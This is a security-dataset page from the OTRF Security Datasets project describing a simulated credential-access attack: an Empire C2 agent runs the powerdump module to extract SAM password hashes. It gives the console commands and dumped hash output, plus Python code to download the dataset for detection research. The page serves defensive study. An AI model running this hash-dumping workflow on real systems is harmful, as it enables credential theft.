Contents

Empire Powerdump Extract Hashes

Contents

Empire Powerdump Extract Hashes#

Metadata#


Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/09/22
Modification Date	2020/09/22
Tactics	TA0006
Techniques	T1003.002
Tags	Calculating SysKey,SAM Read

Dataset Description#

This dataset represents adversaries calculating the SysKey to decrypt Security Account Mannager (SAM) database entries (from registry or hive) and get NTLM, and sometimes LM hashes of local accounts password.

Datasets Downloads#

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_powerdump_sam_access.zip

Simulation Metadata#

Tools#

type	Name	Module
C2	Empire	powerdump

Adversary View#

(Empire: powershell/credentials/mimikatz/sam) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
WE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5972   5/0.0    2020-09-22 08:21:35  http            

(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > usemodule credentials/powerdump*
(Empire: powershell/credentials/powerdump) > info

              Name: Invoke-PowerDump
            Module: powershell/credentials/powerdump
        NeedsAdmin: True
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  DarkOperator
  winfang
  Kathy Peters
  ReL1K

Description:
  Dumps hashes from the local system using Posh-SecMod's
  Invoke-PowerDump

Comments:
  https://github.com/darkoperator/Posh-
  SecMod/blob/master/PostExploitation/PostExploitation.psm1

Options:

  Name  Required    Value                     Description
  ----  --------    -------                   -----------
  Agent True        WE8XYD3K                  Agent to run module on.                 

(Empire: powershell/credentials/powerdump) > execute
[*] Tasked WE8XYD3K to run TASK_CMD_JOB
[*] Agent WE8XYD3K tasked with task ID 4
[*] Tasked agent WE8XYD3K to run module powershell/credentials/powerdump
(Empire: powershell/credentials/powerdump) > 
Job started: TASK2D

wardog:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

(Empire: powershell/credentials/powerdump) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_powerdump_sam_access.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)

References#

https://github.com/GhostPack/Rubeus#example-over-pass-the-hash